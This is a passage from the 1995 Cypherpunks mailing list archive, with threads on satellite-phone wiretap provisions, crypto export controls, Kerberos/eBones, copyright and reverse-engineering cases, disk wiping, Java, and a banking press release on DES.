<199507272242.AA05163@tyrell.net> Just wondering, but do you have a cost breakdown for the figure of $ 500.00 for a "cash card?" Would this be a single-unit manufactured-in-one-piece card or something else? Phil From pgf at tyrell.net Thu Jul 27 15:58:58 1995 From: pgf at tyrell.net (Phil Fraering) Date: Thu, 27 Jul 95 15:58:58 PDT Subject: Sat phone permit "wire"taps In-Reply-To: Message-ID: <199507272254.AA06257@tyrell.net> From: Ted_Anderson at transarc.com I found these paragraphs in a recent Space News interesting. They were at the end of an article titled "Military Officials Open To Using ^^^^^^^^^^^^^^^ Civilian Links" in the July 3rd issue. [...] "Iridium, Globalstar, Inmarsat-P and Odyssey all plan to include features to permit authorized eavesdropping, officials said. Hmm. Anyone here ever heard of the Walkers, or the Rosenbergs? It's a pity that the military has decided that in its zeal to listen in on phone calls, that national security is an expendable asset. It looks like the Chinese or Russian Armies won't be any better by the time they're occupying us, unfortunately. (The really awful part is that what friends I have that are current or past U.S. military don't want to die, AFAIK). Phil From cellf at free.org Thu Jul 27 18:18:26 1995 From: cellf at free.org (jon cameron) Date: Thu, 27 Jul 95 18:18:26 PDT Subject: PS/2 passwd bypassed at bootup? Message-ID: I have my crummy IBM PS/2 passwd protected upon turning it on. I know that removing the battery in a PS/2 deletes the password. But can it be bypassed by an MIS-type if that person has an administration-type of diagnostic/setup/boot-up floppy? Jon C. From fc at all.net Thu Jul 27 18:52:32 1995 From: fc at all.net (Dr. Frederick B. Cohen) Date: Thu, 27 Jul 95 18:52:32 PDT Subject: cost of attacking cards (fwd) Message-ID: <9507280146.AA08061@all.net> Forwarded message: >From fc Thu Jul 27 19:16:26 1995 Subject: cost of attacking cards To: pgf at tyrell.net (Phil Fraering) Date: Thu, 27 Jul 1995 19:16:26 -0400 (EDT) In-Reply-To: <199507272242.AA05163 at tyrell.net> from "Phil Fraering" at Jul 27, 95 05:42:57 pm X-Mailer: ELM [version 2.4 PL22] Content-Type: text Content-Length: 608 > Just wondering, but do you have a cost breakdown for the > figure of $ 500.00 for a "cash card?" I published this stuf about 4 years ago and calculated $5,000, but a few months ago I spent some time with one of the top people in this field and he claimed that $500 was the right figure and backed it up with some experiments. > Would this be a single-unit manufactured-in-one-piece card > or something else? This is based on a volume business where we are breaking cards full time. -- -> See: Info-Sec Heaven at URL http://all.net Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 -- -> See: Info-Sec Heaven at URL http://all.net Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From Greg_Rose at sibelius.sydney.sterling.com Thu Jul 27 20:20:15 1995 From: Greg_Rose at sibelius.sydney.sterling.com (Greg ROSE) Date: Thu, 27 Jul 95 20:20:15 PDT Subject: NSA and the NCSA/Apache web servers In-Reply-To: Message-ID: <9507280320.AA28749@paganini.sydney.sterling.com> "Amir Y. Rosenblatt" wrote: Wow -- hooks to encryption are unexportable -- now THAT's bullshit. Sheesh. A few yuears ago I asked Matt Blaze if he would publish CFS with the sryptography removed, and he told me that AT&T's lawyers also believed this to be true. (So, of course, his answer was "No".) The hooks are as important as the crypto code. Interestingly though, Kerberos made it to Australia (Bond University I think) legally. Greg Rose INTERNET: greg_rose at sydney.sterling.com Sterling Software VOICE: +61-2-9975 4777 FAX: +61-2-9975 2921 28 Rodborough Rd. 35 0A 79 7D 5E 21 8D 47 E3 53 75 66 AC FB D9 45 French's Forest co-mod sci.crypt.research NSW 2086 Australia. USENIX Director. From johnl at radix.net Thu Jul 27 21:35:30 1995 From: johnl at radix.net (John A. Limpert) Date: Thu, 27 Jul 95 21:35:30 PDT Subject: Sat phone permit "wire"taps Message-ID: <199507280433.AAA03234@saltmine.radix.net> > "Officials said government police authorities have expressed concern >that satellite telephone systems may enable people to conduct >conversations that are out of the earshot of government investigators. >This would be particularly true in an area where, for example, there >were no gateway through which government investigators could tap into >calls. Is there a technical reason why communications through these future satellite systems couldn't be encrypted? I thought that all of these systems were based on vocoders and digital transmission, just like a secure telephone. If the future telecommunications infrastructure is digital end to end, the carriers are going to be transporting streams of bits at some predetermined rate, not analog voice. Whether the bits are mu law encoded audio or PGP encrypted pictures of Senator Exon and his favorite gerbil should be irrelevant to the network. I wouldn't conduct a sensitive conversation over a wireless or cellular phone system. Why would the prospective customers of a satellite based system be satisfied with a system that allows anyone with the proper equipment to secretly monitor their conversations? I assume the market for this type of system is going to be lawyers, business executives and others who are willing to pay the high rates. Just the sort of people who should be concerned about the confidentiality of their conversations. -- John A. Limpert johnl at Radix.Net From trost at cloud.rain.com Thu Jul 27 21:44:38 1995 From: trost at cloud.rain.com (Bill Trost) Date: Thu, 27 Jul 95 21:44:38 PDT Subject: copyrighting algorithms In-Reply-To: <9507270754.AA04474@sirius.wi.WHU-Koblenz.de> Message-ID: Wolfgang Roeckelein writes: >I wasn't aware that you could copyright an algorithm. Patent, >yes, but not copyright. Intellectual property meens secret, >right? Aren't there any precendence cases involving propriety >schemes that are reverse engineered? Game cartridges (I think sega was involved) You might be referring to Nintendo vs. Galoob, which was used as a sample case in an January 1994 article in the Communications of the ACM titled "Copyright's Fair use Doctrine and Digital Data". The article states Nintendo charged Lewis Galoob Toys with contributory copyright infringement because Galoob's Game Genie allowed users to alter certain aspects of the play of Nintendo video games.... Nintendo's theory was that Galoob provided consumers with a device knowing they would use it to alter the audiovisual sequences of the Nintendo games, thereby creating an unauthorized derivative work. Galoob argued fair use in defense. Nintendo lost the case mostly because Nintendo wasn't going to lose any money over the device -- after all, you still have to buy the game cartridge.... As for the quoted material, "Intellectual property meens [sic] secret" is quite mistaken. Copyright and patents are the two most common forms of intellectual property (AFAIK), and neither of them are secret (unless they're classified patents, but never mind...). From hal9001 at panix.com Thu Jul 27 22:18:37 1995 From: hal9001 at panix.com (Robert A. Rosenberg) Date: Thu, 27 Jul 95 22:18:37 PDT Subject: Banks and Crypto Message-ID: At 08:03 7/27/95, Robert Hettinga wrote: >At 11:29 PM 7/26/95, Robert A. Rosenberg wrote: >>At 13:25 7/26/95, KDAGUIO at aba.com wrote: >>>See attached file: F:\OFFILES\KODMAIL.MSG > >>Is there ANY reason why you did not just paste the text of this file into >>your message? > >Cluelessness? Carelessness? Some version of "-lessness", I'm sure... > >>Also, if you are going to attach files in lieu of writing >>messages, it might be useful to mention what Wordprocessor was used to >>create the file so it can be read. In this case, what format is your file >>in? > >I just used a special feature on my Mac to deal with it. It's called a >"trash can". > >Please remember that almost all such attachments, unless identified (even >if identified, actually) usually get deleted. > I too am a Mac User. I usually pass files like this through MacLink+ first since it can usually spot what flavor of PC Wordprocessor was used. In this case, it was unable to accept it as any flavor of WordPerfect PC (which I assume was the correct designation for the WP Office WP which I assume was used since the MUA was shown in the Header as WP Office. From eay at mincom.oz.au Thu Jul 27 22:31:47 1995 From: eay at mincom.oz.au (Eric Young) Date: Thu, 27 Jul 95 22:31:47 PDT Subject: NSA and the NCSA/Apache web servers In-Reply-To: <9507280320.AA28749@paganini.sydney.sterling.com> Message-ID: On Fri, 28 Jul 1995, Greg ROSE wrote: > A few yuears ago I asked Matt Blaze if he would > publish CFS with the sryptography removed, and he > told me that AT&T's lawyers also believed this to > be true. (So, of course, his answer was "No".) > The hooks are as important as the crypto code. > > Interestingly though, Kerberos made it to > Australia (Bond University I think) legally. I was the person who put the encryption back into that version of kerberos (which is now called eBones). They removed all encryption calls. They had actually pulled out all calls to the des routines, so we had a 'working' authentication system that encrypted nothing. This version was called Bones (they ran a program called parania over Kerberos, and that left Bones :-). When I left, we had Kerberos working but I had not tested against 'true' kerberos. I belive it has been fixed by 'those that have followed' and now fully interoperates with MIT kerberos v4. So the 'international' version of kerberos is fully legal. BTW I wrote libdes (my DES library) as part of this work. Luckily I have escaped from Kerberos/eBones when I left Bond Uni but my nights are still haunted with memories of trying to follow the code :-). eric (who is having far more fun putting an SSL package together :-) -- Eric Young | Signature removed since it was generating AARNet: eay at mincom.oz.au | more followups that the message contents :-) From tcmay at sensemedia.net Thu Jul 27 22:33:27 1995 From: tcmay at sensemedia.net (Timothy C. May) Date: Thu, 27 Jul 95 22:33:27 PDT Subject: Sat phone permit "wire"taps Message-ID: At 4:34 AM 7/28/95, John A. Limpert wrote: >Is there a technical reason why communications through these future >satellite systems couldn't be encrypted? I thought that all of these >systems were based on vocoders and digital transmission, just like >a secure telephone. There should be no technical reason why voice encryption, or even end-to-end digital packet encryption, cannot be used. The various satellite systems (Iridium, Teledesic, Globalstar, etc.) also are targetting laptops, personal communicators (a la Newton, Envoy, etc.), and thus cannot afford to screw with the signal in any significant way. (And error correction codes could easily deal with even fairly massive screwing around with, should the satcom companies be foolish enough to try to "dither" the signals....which I doubt they'll ever do.) The risk is not technical, but legislative. The government of the U.S. could, for example, mandate to the satcom companies that only GAK/escrow encryption is permissable...how enforceable this is echoes the debate we've had for almost three years on such things. But the McCaw/Microsoft/Motorola/Qualcomm sorts of companies may have to make token efforts to comply. I don't expect the crypto banners to win, long run, but I would guess that right now they are jawboning with the main satellite companies to make things harder. The faster systems like "Nautilus" are deployed, the better. --Tim May .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at sensemedia.net | anonymous networks, digital pseudonyms, zero 408-728-0152 | knowledge, reputations, information markets, Corralitos, CA | black markets, collapse of governments. Higher Power: 2^756839 | Public Key: PGP and MailSafe available. "National borders are just speed bumps on the information superhighway." From tcmay at sensemedia.net Thu Jul 27 22:41:12 1995 From: tcmay at sensemedia.net (Timothy C. May) Date: Thu, 27 Jul 95 22:41:12 PDT Subject: The Value of "Attachments" on this List Message-ID: See attached file: F:\MYFILES\MAY.MSG The attached file: "MAY.MSG" has been attached in HyperMIME format. It may be read by any Exidy Sorcerer computer, using Electric Pencil 1.2 (release date 7-81). From tcmay at sensemedia.net Thu Jul 27 22:48:37 1995 From: tcmay at sensemedia.net (Timothy C. May) Date: Thu, 27 Jul 95 22:48:37 PDT Subject: mac share/freeware app for overwriting unused hd space? Message-ID: At 2:27 PM 7/27/95, j. ercole wrote: >Can anyone point me towards a program that's freeware or shareware that >will overwrite all the unused i.e., "trashed" space on my hard drive(s)? I >sincerely apologise if this is a faq. I know norton's will do it but I >don't presently have that installed on my machine. Thanks oodles, Well, getting the commercial products (fairly cheap, for Norton) is the first line of defense if you're paranoid. Erasing a file and then filling the disk with other files (even copies of existing files) will do the same thing, albeit only once. At the most serious level of attack (the "threat model"), such as the FBI labs in Quantico or the NSA, there are reports that specialized disk drive heads are used to recover earlier signals that are not erased even with N active overwrite steps (apparently the head jitter in most drives means that each write cycle is slightly different, even on the same disk region, and a slight "shadow" or "ghost" of previous writes can sometimes be extracted). --Tim May, who hopes this will not reignite the thread about how to use thermite to permanently erase disk drives .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at sensemedia.net | anonymous networks, digital pseudonyms, zero 408-728-0152 | knowledge, reputations, information markets, Corralitos, CA | black markets, collapse of governments. Higher Power: 2^756839 | Public Key: PGP and MailSafe available. "National borders are just speed bumps on the information superhighway." From tcmay at sensemedia.net Thu Jul 27 23:23:31 1995 From: tcmay at sensemedia.net (Timothy C. May) Date: Thu, 27 Jul 95 23:23:31 PDT Subject: Java, Netscape, OpenDoc, and Babel Message-ID: I've been reading up on Java at the Web sites (such as http://java.sun.com/1.0alpha3/doc/overview/java/index.html) and am awaiting with bated breath the HotJava browser port for the Mac, to play with. The "tower of Babel" is getting higher and higher, with Python, TCL, Safe-TCL, Perl, and the various multimedia languages (Shockwave, Lingo, ScriptX) all competing for attention. I guess this is all to the good, and let the best languages and frameworks prevail. On a SmalltalkAgents list I am on (I own SmalltalkAgents, a powerful implementation for the Mac, with a Windows version coming), one poster had the following to say: "I am hoping that OpenDoc and specifically CyberDog from Apple provide the basis for a more rational and open Internet component environment. NetScape is becoming a kitchen sink app and any solution they create for plug-in components will set back things when an open industry standard for components (OpenDoc) is about to be released." NetScape a kitchen sink? Perhaps, but kitchen sinks have been selling pretty well for years. I just picked up a copy of "Pattern Languages of Program Design," edited by James Coplien (of the well-regarded C++ book) and Douglas Schmidt. This book has a series of interesting papers on the "design pattern" approach (as in the book by Erich Gamma et. al.). The idea behind "pattern languages," seen by some as the evolution of object-orientation, is to find architectural abstractions, such as "iterarators" and "constructors" which encapsulate important behavioral features of a system. The "applied ontology" in crypto seems to be a natural fit. Or so I think. Maybe wishful thinking. But in which framework or language, given the profusion of frameworks and languages? We had some TCL advocates a while back (Strick, Hal...)...any reaction to Java? And so it goes. --Tim May .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at sensemedia.net | anonymous networks, digital pseudonyms, zero 408-728-0152 | knowledge, reputations, information markets, Corralitos, CA | black markets, collapse of governments. Higher Power: 2^756839 | Public Key: PGP and MailSafe available. "National borders are just speed bumps on the information superhighway." From carolann at censored.org Thu Jul 27 23:41:29 1995 From: carolann at censored.org (UnCensored Girls Anonymous) Date: Thu, 27 Jul 95 23:41:29 PDT Subject: The Value of "Attachments" on this List Message-ID: <199507280641.XAA14433@mailhost.primenet.com> TCMay carefully encrypted on July 28th, 1995: >See attached file: F:\MYFILES\MAY.MSG > >The attached file: "MAY.MSG" has been attached in HyperMIME format. It may >be read by any Exidy Sorcerer computer, using Electric Pencil 1.2 (release >date 7-81). > Not having access to Electric Pencil 1.2, Sharpener 2.7.1 was able to "point ot the correct keypoint", and Leadflow 1.6.5 traced the stream of bits to determine this vital message: Have a nice day today! And, A nicer tomorrow! Why thanks Tim! Love Always, Carol Anne ps FV reports others had same problems. Yet 3 days have passed. Shawmut bank only took 9 hours to fix the big 'double charge' problem they encountered last weekend. -- Member Internet Society - Certified BETSI Programmer - Webmistress *********************************************************************** Carol Anne Braddock (cab8) carolann at censored.org 206.42.112.96 My Homepage The Cyberdoc *********************************************************************** ------------------ PGP.ZIP Part [017/713] ------------------- M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M MF=O0H+*%(-S%&>S%+FS& http://dcs.ex.ac.uk/~aba/export/ From wolfgang at wi.WHU-Koblenz.de Fri Jul 28 00:17:39 1995 From: wolfgang at wi.WHU-Koblenz.de (Wolfgang Roeckelein) Date: Fri, 28 Jul 95 00:17:39 PDT Subject: copyrighting algorithms Message-ID: <9507280717.AA07537@sirius.wi.WHU-Koblenz.de> Hi, From: Bill Trost > >Wolfgang Roeckelein writes: > >I wasn't aware that you could copyright an algorithm. Patent, > >yes, but not copyright. Intellectual property meens secret, > >right? Aren't there any precendence cases involving propriety > >schemes that are reverse engineered? > > Game cartridges (I think sega was involved) > >You might be referring to Nintendo vs. Galoob, which was used as a >sample case in an January 1994 article in the Communications of the >ACM titled "Copyright's Fair use Doctrine and Digital Data". The >article states No, I was referring to a case, where a third party game cartridges manufacturer reverse engineered the specifications of the game cartridges slot for producing his own cartridges for this game. Unfortunatly, I have lost the reference and the names of the companies, but this is the main case cited when it comes to reverse engineering propriety schemes. Maybe I can dig this out, or another member of the list has details available. Wolfgang --- Dipl.-Wirtsch.-Inf. Voice: +49 261 6509 173 Wolfgang Roeckelein Fax: +49 261 6509 179 WHU Koblenz E-Mail: roeckelein at wi.whu-koblenz.de Burgplatz 2 (NeXTmail ok) D-56179 Vallendar WWW: http://www.whu-koblenz.de/~wolfgang/ Germany --rsa--------------------------------8<------------------------------------- #!/usr/local/bin/perl -s-- -export-a-crypto-system-sig -RSA-in-3-lines-PERL ($k,$n)=@ARGV;$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2% Sa2/d0 Message-ID: <199507280729.DAA01649@clark.net> Just a quick note to chime in. The OSF just did a deal with Sun to port Java to several platforms. The OSF is opening a "web mall" where you can grab software objects and run them. Expect to Java *really* take off in about 2-3 months. Every business on the net is going to want a Java shopping-client-basket on their web-mall/web-store. (Web Consultants! Learn Java!) -Ray From merriman at arn.net Fri Jul 28 01:27:40 1995 From: merriman at arn.net (David K. Merriman) Date: Fri, 28 Jul 95 01:27:40 PDT Subject: Java, Netscape, OpenDoc, and Babel Message-ID: <199507280834.DAA29882@arnet.arn.net> > > Just a quick note to chime in. The OSF just did a deal with Sun >to port Java to several platforms. The OSF is opening a "web mall" >where you can grab software objects and run them. Still tentative, or is there a Web address? Dave Merriman This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th of the PGP executable. See below for getting YOUR chunk! ------------------ PGP.ZIP Part [015/713] ------------------- M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8 at X'HB_9H#&\X MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3 M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M ------------------------------------------------------------- for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/ From greg at ideath.goldenbear.com Fri Jul 28 01:57:29 1995 From: greg at ideath.goldenbear.com (Greg Broiles) Date: Fri, 28 Jul 95 01:57:29 PDT Subject: copyrighting algorithms In-Reply-To: <199507280808.AA19581@ideath.goldenbear.com> Message-ID: <199507280816.AA19640@ideath.goldenbear.com> -----BEGIN PGP SIGNED MESSAGE----- Wolfgang Roeckelein writes: > No, I was referring to a case, where a third party game cartridges > manufacturer reverse engineered the specifications of the game > cartridges slot for producing his own cartridges for this game. Sounds like _Sega v. Accolade_, 977 F.2d 1510 (9th Cir., 1993). I don't have it in front of me, but Terry Carroll's Copyright FAQ (ftp://rtfm.mit.edu/pub/usenet/news.answers/law/copyright/faq/part2) cites it for the proposition that dissasembly of a copyrighted work can be fair use if there is no other way to reach noncopyrightable (functional, not expressive) elements of an existing work. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMBicgX3YhjZY3fMNAQFULwQAgvWmS1+p5BbN/C3wnVl21jqVjTL/tQIN SMITIXhXTLaNmdGtlnPANC6brOYXb/17d2zHBwR0BcUWiH/AFjBsTLIxwroOx5np kRSOk7dmw4jifrw4tMJw6Pe/pi7zs+IwT94ToEIKxcXRMs1lPruGdu2HM+kS+4ds mCF+FKmP89E= =UDoU -----END PGP SIGNATURE----- From wmono at Direct.CA Fri Jul 28 02:00:27 1995 From: wmono at Direct.CA (William Ono) Date: Fri, 28 Jul 95 02:00:27 PDT Subject: "Encryption" IRC script? Message-ID: <199507280858.BAA18266@mail.direct.ca> C'punks.. I was just DCC'ed this rather cryptic IRCII script. The author, nickname george.. /whois george 311 George ~root original.netwest.com * :000-System Admin-000 312 George irc.escape.com :[198.6.71.13] Escape - New York City (I highly doubt he's really the root there - no identd running?) claims that it's an encryption routine in IRC. I don't know how to read that script language, and I'm most certainly not a crypto expert, so I've attached the script in hopes that someone can tell me if this guy is a whacko and whatnot. (Sorry for those not interested - the file was small, so I figured that not too many people will mind. It is ASCII with some nonprintables contained within.) I warn that I haven't tested the script, and as with all untrusted scripts, DO NOT RUN IT until it's confirmed by someone that it's safe! I-CODE.IRC -- William Ono PGP 2902B621 fingerprint = 51 6B BC 81 57 D8 FF 6A 5A A1 A4 6B 9A E3 E5 EE = fingerprint PGP-encrypted mail welcome! Witty Quote Goes Here -------------- next part -------------- A non-text attachment was scrubbed... Name: bin00001.bin Type: application/octet-stream Size: 5286 bytes Desc: "" URL: From don at cs.byu.edu Fri Jul 28 03:14:23 1995 From: don at cs.byu.edu (Donald M. Kitchen) Date: Fri, 28 Jul 95 03:14:23 PDT Subject: "Encryption" IRC script? Message-ID: <199507281013.EAA16859@bert.cs.byu.edu> Yes, there are scripts that implement des encryption of IRC sessions, using RSA to swap keys. (the encrypted lines always start with "clipper:" on mine. I don't think it's the same as the one you've got, but yes, they are out there. (See what you miss when you can't find people on the #crypto channel!?!) The channel that was used to coordinate against a recent spam attack of remailers turned into a rather interesting chat about several subjects. (Including digicash) It was about two months worth of cpunks... (without the normally-cooresponding year's worth of alt.conspiracy reposts!!) Maybe it would be fun to actually use the #crypto channel. (Unless there's a #cpunk channel I don't know about?) Don Sorry I haven't been signing lately, but I've been replaced by a double. From fc at all.net Fri Jul 28 03:45:54 1995 From: fc at all.net (Dr. Frederick B. Cohen) Date: Fri, 28 Jul 95 03:45:54 PDT Subject: NSA and the NCSA/Apache web servers In-Reply-To: <9507280320.AA28749@paganini.sydney.sterling.com> Message-ID: <9507281039.AA13694@all.net> > > > "Amir Y. Rosenblatt" wrote: > Wow -- hooks to encryption are unexportable -- now THAT's bullshit. Sheesh. > > A few yuears ago I asked Matt Blaze if he would > publish CFS with the sryptography removed, and he > told me that AT&T's lawyers also believed this to > be true. (So, of course, his answer was "No".) > The hooks are as important as the crypto code. > > Interestingly though, Kerberos made it to > Australia (Bond University I think) legally. Actually, neither hooks nor encryption are unexportable, you just need a license to export them. I got a license to export an RSA encryption scheme and a general purpose hook into encryption for integrity toolkit. It took a few months and was not very difficult, but you have to apply. -- -> See: Info-Sec Heaven at URL http://all.net Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From meredith at ecid.cig.mot.com Fri Jul 28 04:38:59 1995 From: meredith at ecid.cig.mot.com (Andrew D Meredith) Date: Fri, 28 Jul 95 04:38:59 PDT Subject: Hooks to Crypto (was Re: NSA and the NCSA/Apache web servers) In-Reply-To: <9507281039.AA13694@all.net> Message-ID: <9507281237.ZM15500@jurua.sweng.ecid.cig.mot.com> On Jul 28, 12:18pm, Dr. Frederick B. Cohen wrote: > Subject: Re: NSA and the NCSA/Apache web servers > Actually, neither hooks nor encryption are unexportable, you > just need a license to export them. >-- End of excerpt from Dr. Frederick B. Cohen I hope I'm not alone in wondering why on earth this is the case. Ok, exporting cryptography from the USA is restricted, and highly controversial. I think there has been something on this one already. But what is it, in the legal wibble, that make _hooks_ to cryptography restricted. How have they worded things to make this the case. The hooks are of course completely useless in and of themselves. You can only do anything useful with them if you have the matching crypto package. Yours a confused Brit ... who doesn't have this problem ... yet!! -- ___________________________________________________________________ Andrew Meredith Senior Systems Engineer Tel: (direct) +44(0) 1793 545377 Network Engineering Tools Group Tel: (main) +44(0) 1793 541541 Motorola ECID Fax: +44(0) 1793 420915 16, Euroway, Blagrove Swindon SN5 8YQ, UK email: Andrew_Meredith at email.mot.com ___________________________________________________________________ From jya at pipeline.com Fri Jul 28 05:43:43 1995 From: jya at pipeline.com (John Young) Date: Fri, 28 Jul 95 05:43:43 PDT Subject: NYT on SuperGrassley Message-ID: <199507281243.IAA01247@pipe2.nyc.pipeline.com> The New York Times, July 28, 1995, p. A26. [Editorial] Senator Grassley's Surf Police An academic study suggesting that the Internet is awash in bestiality, pedophilia and other kinky sex turns out to have been seriously flawed. Politicians like Senator Charles Grassley who waved the study around as an argument for intrusive regulation have stopped doing so. But Mr. Grassley and his allies have not backed off from their drive to draft unnecessary legislative restrictions on computer communications. Earlier this summer, Senator James Exon attached an amendment to the Senate version of a telecommunications bill that would impose Federal penalties on those who made available material deemed unsuitable for children. The unreliable study that did much to spur this bad legislating was conducted by Marty Rimm, then an undergraduate at Carnegie-Mellon University. It was reprinted in the Georgetown Law Journal and served as the basis for a credulous Time magazine article early this month. Mr. Rimm's academic supervisors have since made clear that the study had serious defects. The likelihood that children will be accidentally deluged with sexually charged computer graphics is much smaller than Mr. Rimm and his promoters suggested. Furthermore, to the extent that any problem exists, the best response is not through heavyhanded, constitutionally dubious legislation but parental education and discretionary user controls. Mr. Rimm's study looked at the computer habits of adults. He focused not on generally accessible areas of the Internet but on separate, commercial adult bulletin board services that require special procedures to find and use. This, critics note, is like visiting an adult bookstore and using the percentage of gamey titles to generalize about the contents of all bookstores. He also looked, less carefully, at specialized areas of the Internet that would be hard to stumble upon by accident. By Mr. Rimm's own calculations, less than 1 percent of all material on the Internet itself is raunchy, although this tiny percentage is unusually popular among the adults he surveyed. Another Carnegie-Mellon study, focusing on families with high school children, suggests that sexually explicit material is much less popular among these users. To be sure, sexually explicit material that would be offensive to some users can be found on the Internet. It is within the reach of computer-literate children using the networks without parental supervision. But the problem is being exaggerated to create a pretext for restricting the material available to adult users of computers. Some members of Congress, out of political greed or ignorance, want to censor what can be put on the Net and prosecute those who post legal but raunchy material. The approaches being advocated by Mr. Exon and Mr. Grassley are unwarranted and unconstitutional. They are also impractical. Material posted to the Internet in foreign countries, beyond the reach of American law, is as available to users as domestically posted material. Items can also be posted through anonymous mailers that make it impossible to identify the original source. Censorship would also have the unwelcome effect of restricting adults to reading and viewing material deemed suitable for children, and would stunt the future of the networks as a medium for artistic expression. Parents who want to restrict what their children are able to call up on their computers can avail themselves of software now available on the market that can block out unwanted material. Filtering out such material at the user end is a more practical, and far less objectionable, approach than limiting a nation of computer users to baby talk. Such devices are not foolproof, of course. The surest defense is for parents to try to teach their children the kind of healthy values that would make them uninterested in, or immune to, sexually exploitative material. [End] From KDAGUIO at aba.com Fri Jul 28 05:46:42 1995 From: KDAGUIO at aba.com (KDAGUIO at aba.com) Date: Fri, 28 Jul 95 05:46:42 PDT Subject: Banks and Crypto - Again Message-ID: I apologize for the earlier transmission error/offense. Our server has been down intermittently so I have not received many flames yet. The meeting mentioned has already taken place resulting in significant progress toward our goals. The server is now up. Flame away my friends. ...kawika... ****************************************************************** CONTACT: Sonia Barbara FOR IMMEDIATE RELEASE (202) 663-5469 (1995) ABA REAFFIRMS SUPPORT FOR PRIVATE-SECTOR CONTROL OF CRYPTOGRAPHY Association Recommends a 10-year Extension for the Data Encryption Standard WASHINGTON, July 21 -- The Data Encryption Standard (DES) should be recertified for at least 10 more years to allow interested financial institutions adequate time to convert to any new cryptography standard, the American Bankers Association said in a policy statement issued today. Encryption is the process whereby sensitive data communications, such as wire transfers, credit card and automated teller machine transactions, are protected by secret codes to protect their confidentiality. DES, released in 1977, is the primary method used by financial institutions to encrypt information. Critics say that the longer DES is used, the more likely its code could be broken. While realizing this could limit its life span as a government certified standard, ABA warned that requiring banks to convert to a new standard by 1998 (the year DES's certification expires) could be prohibitively costly due to the high level of electronic funds transfers secured by DES. ABA therefore encouraged the National Institute for Standards and Technology (NIST) to continue to endorse DES as a Federal Information Processing Standard (FIPS) for use by the financial community. There has been an ongoing debate regarding who should control the development and support of private-sector computer security standards: the government or the private sector. ABA strongly recommends that the U.S. government work with the private sector and Congress in an open forum to develop a comprehensive policy on the commercial use of cryptography. In its newly-revised policy statement on cryptography, ABA proposed alternatives to DES and outlined other criteria that must be met before changes in cryptographic standards can be accepted by the banking industry. These criteria -- which will be presented next week to representatives of the White House, U.S. Department of Commerce, National Security Agency (NSA) and federal banking agencies -- were developed following a two-day meeting held in June of bankers, vendors and crypto experts concerned about the federal government's direction regarding private-sector information security. Specifically, ABA recommended: * The financial services industry be allowed to continue to use DES based on risk assessment (e.g. value of the transaction) and the business application involved. * A security framework encompassing a family of commercially available algorithms, including DES, be developed. This framework should include a process for negotiated algorithm selection based on the level of risk and other business requirements. * Opposition to government mandated key management systems for financial applications where keys would have to be stored outside the financial institution (e.g. key registration/surrender or the mandatory escrow of cryptographic keys). Instead, banks should continue to be responsible for key management and continue to cooperate with government for law enforcement purposes, as required by law. * Export of cryptography for financial applications must not be restricted. * Full participation of Congress and the private sector before establishing a U.S. policy for the commercial use of cryptography, instead of being carried out solely by Executive Order. [Note: These recommendations were summarized. For the full statement, please call Sonia Barbara at 202/663-5469.] The American Bankers Association is the only national trade and professional association serving the entire banking community, from small community banks to large bank holding companies. ABA members represent approximately 90 percent of the commercial banking industry's total assets, and about 94 percent of ABA members are community banks with assets less than $500 million. ### From wolfgang at wi.WHU-Koblenz.de Fri Jul 28 06:04:28 1995 From: wolfgang at wi.WHU-Koblenz.de (Wolfgang Roeckelein) Date: Fri, 28 Jul 95 06:04:28 PDT Subject: copyrighting algorithms Message-ID: <9507281303.AA08172@sirius.wi.WHU-Koblenz.de> Hi, >Wolfgang Roeckelein writes: >> No, I was referring to a case, where a third party game cartridges >> manufacturer reverse engineered the specifications of the game >> cartridges slot for producing his own cartridges for this game. > >Sounds like _Sega v. Accolade_, 977 F.2d 1510 (9th Cir., 1993). >I don't have it in front of me, but Terry Carroll's Copyright FAQ >(ftp://rtfm.mit.edu/pub/usenet/news.answers/law/copyright/faq/part2) >cites it for the proposition that dissasembly of a copyrighted work >can be fair use if there is no other way to reach noncopyrightable >(functional, not expressive) elements of an existing work. Yes, thank you for pointing this out. I'm glad that I was right with Sega... Wolfgang --- Dipl.-Wirtsch.-Inf. Voice: +49 261 6509 173 Wolfgang Roeckelein Fax: +49 261 6509 179 WHU Koblenz E-Mail: roeckelein at wi.whu-koblenz.de Burgplatz 2 (NeXTmail ok) D-56179 Vallendar WWW: http://www.whu-koblenz.de/~wolfgang/ Germany --rsa--------------------------------8<------------------------------------- #!/usr/local/bin/perl -s-- -export-a-crypto-system-sig -RSA-in-3-lines-PERL ($k,$n)=@ARGV;$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2% Sa2/d0 In-Reply-To: <9507281237.ZM15500@jurua.sweng.ecid.cig.mot.com> Message-ID: <9507281300.AA22773@all.net> ... > > Actually, neither hooks nor encryption are unexportable, you > > just need a license to export them. ... > I hope I'm not alone in wondering why on earth this is the case. They don't want to encourage encryption if they can avoid it. It impairs their ability to gather intelligence. > Ok, exporting cryptography from the USA is restricted, and highly > controversial. I think there has been something on this one already. > > But what is it, in the legal wibble, that make _hooks_ to > cryptography restricted. How have they worded things to make this the > case. Legal? What makes you think so? It hasn't made it to the courts yet because people in the US aren't willing to risk jail for over their right to do it. The only court case I am aware of was the RSA case and in that one, the courts ruled against the NSA - but in today's political and economic environment, people who do cryptography don't want to risk it. > The hooks are of course completely useless in and of themselves. You > can only do anything useful with them if you have the matching crypto > package. Not really right. It's very easy to change a compression hook into an encryption hook using standard off-the-shelf shareware, public domain software, or commercial products. > Yours a confused Brit ... who 